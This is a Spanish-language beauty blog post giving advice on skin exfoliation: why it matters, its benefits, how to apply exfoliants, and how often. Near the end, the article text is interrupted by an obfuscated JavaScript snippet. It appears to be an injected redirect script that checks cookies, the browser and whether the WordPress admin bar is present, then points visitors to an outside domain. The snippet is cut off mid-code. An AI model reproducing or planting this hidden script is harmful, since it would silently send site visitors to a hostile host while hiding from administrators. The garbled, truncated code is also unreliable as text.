Comprar exfoliantes online

Hoy venimos con un tema que no es novedad en el blog, ya que ya os hablamos de la exfoliación aquí y aquí.

Pero esta vez queremos profundizar aún más en el tema y daros una serie de consejos que os ayudaran a exfoliar vuestra piel de una forma óptima y respetuosa.

¿Por que es tan importante exfoliar nuestra piel? Para que os hagáis una idea el ciclo de  regeneración natural de la piel tarda aproximadamente 28 días en completarse. El cuerpo humano por naturaleza tiene la capacidad de restaurar las células muertas o enfermas por nuevas células en perfecto estado. Sin embargo, con el paso del tiempo o durante épocas de debilidad, tensión o fatiga, este proceso se relantece, y la piel pierde su oxigenación y humectación natural, podríamos decir que la piel siente como si se asfixiará al no poder eliminar del todo las células muertas, por ello notamos que nuestra piel comienza a lucir apagada y sin luminosidad al no poder absorber humedad, nutrientes ni poder oxigenarse adecuadamente.

Debemos reconocer que muchos de nosotros cuando escuchamos la palabra “exfoliar” no podemos evitar relacionar esta acción con la idea de aplicar un producto agresivo sobre nuestra piel.

Si bien es cierto que aplicar un exfoliante sin cuidado y sin control puede tener consecuencias negativas, sobretodo sobre una piel extremedamente sensible, siempre y cuando se aplique con cuidado no tendremos nada que temer.

Entre la multitud de beneficios de la exfoliación destacan:

  • Limpieza, purificación y tonificación de nuestra piel.
  • Su función seboreguladora nos ayuda a regular los niveles de grasa en nuestra piel.
  • Renovación celular.
  • Elimina la sequedad de la piel.
  • Nos ayuda a evitar que el vello se enquiste.
  • Activa la micro-circulación.
  • Nos ayuda a eliminar manchas y cicatrices.
  • Aumento de luminosidad en la piel.

Ahora que ya sabemos porque es tan importante y cuales son los beneficios, lo más importante: ¿como exfoliamos nuestra piel?

Siempre con la piel previamente humedecida, aplicaremos el producto, existen exfoliantes enzimáticos que se aplican en seco, pero en el caso de no especificar en el envase siempre deberemos humedecer la piel si no queremos dañarla.

La hora del baño es el mejor momento para aplicarnos los productos exfoliantes ya que con los vapores favorecemos el proceso.

Aplicaremos con un suave masaje circular que nos ayudará a retirar mejor las células muertas, y para acabar retiraremos el producto con agua tibia hasta que la bien quede limpia y sin residuos.

Seremos un pelín más insistentes en aquellas zonas de nuestro cuerpo más propensos a acumular células muertas como son codos o rodillas.

Un detalle importante que os queremos recordar, exfoliar la piel del rostro es más delicada que la del cuerpo, por ello prestaremos especial cuidado al masajear el producto sobre la piel para evitar arrastrar demasiado.

Recuerda evitar la zona del contorno de los ojos y el contorno de los labios.

¿Cada cuanto debo exfoliarme? Se recomienda que si no tenemos el hábito de exfoliar nuestra piel comencemos con una vez a la semana, pero tras varias sesiones de exfoliación deberemos alargarlas a una vez cada 15 días.

Tras finalizar la exfoliación nunca olvides hidratar la piel, tan importante es retirar las células muertas como ayudar a nuestra piel a recuperar la hidratación.

Ya verás que el resultado merece la pena, una piel luminosa y radiante al alcance de cualquiera.

¿Qué productos utilizáis para exfoliar vuestra piel? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone